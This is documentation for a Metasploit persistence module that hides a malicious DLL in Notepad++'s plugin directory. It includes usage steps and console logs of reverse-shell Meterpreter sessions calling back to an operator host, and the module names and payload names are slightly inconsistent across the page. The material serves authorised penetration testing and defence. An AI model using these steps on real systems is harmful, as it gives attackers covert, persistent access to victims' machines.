adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f632cf34bfef55fc2f602f620cda2aa70fb74c8d
metasploit-gs/documentation/modules/exploit/windows/persistence/notepadpp_plugin.md
T
h00die f4a195b88a persistence modules cleanup
2026-01-14 13:49:29 -05:00

97 lines
3.7 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module create persistence by adding a malicious plugin to Notepad++, as it blindly loads and
executes DLL from its plugin directory on startup,meaning that the payload will be executed every time Notepad++ is launched.
The payload will have same privileges as user executing Notepad++.
## Verification Steps
1. Start msfconsole
1. Get a shell/meterpreter on a windows box
1. Do: `use exploit/windows/persistence/notepad++_persistence `
1. Do: `set session #`
1. Do: `run`
1. You should get persistence once the targeted application is open and closed.
## Options
### PAYLOAD_NAME
Name of the payload file. Defaults to `<random>.dll`
## Scenarios
### Windows 10
Original shell
```
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
LHOST => wg0
LPORT => 4242
[*] Started reverse TCP handler on 192.168.3.7:4242
[*] Meterpreter session 1 opened (192.168.3.7:4242 -> 10.5.134.148:49988) at 2025-11-12 16:24:53 +0100
meterpreter > getuid
Server username: WIN10_2004_8D28\Administrator
meterpreter > sysinfo
Computer : WIN10_2004_8D28
OS : Windows 10 2004 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
```
Persistence
```
msf exploit(multi/handler) > use exploit/windows/persistence/notepadpp_plugin_persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/notepadpp_plugin_persistence) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/notepadpp_plugin_persistence) > set session 1
session => 1
msf exploit(windows/persistence/notepadpp_plugin_persistence) > run verbose=true
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/notepadpp_plugin_persistence) > [*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Notepad++ present and plugin folder is writable
[+] Writing payload to C:\Program Files\Notepad++\plugins\JzHPoxkI\
[*] Payload (9216 bytes) uploaded on WIN10_2004_8D28 to C:\Program Files\Notepad++\plugins\JzHPoxkI\
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_2004_8D28_20251112.2704/WIN10_2004_8D28_20251112.2704.rc
[*] Sending stage (230982 bytes) to 10.5.134.148
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.134.148:50011) at 2025-11-12 16:27:19 +0100
msf exploit(windows/persistence/notepadpp_plugin_persistence) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN10_2004_8D28\Administrator @ WIN10_2004_8 192.168.3.7:4242 -> 10.5.134.148:49988 (10.5.
D28 134.148)
2 meterpreter x64/windows WIN10_2004_8D28\Administrator @ WIN10_2004_8 192.168.3.7:4444 -> 10.5.134.148:50011 (10.5.
D28 134.148)
msf exploit(windows/persistence/notepadpp_plugin_persistence) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : WIN10_2004_8D28
OS : Windows 10 2004 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10_2004_8D28\Administrator
```
Reference in New Issue View Git Blame Copy Permalink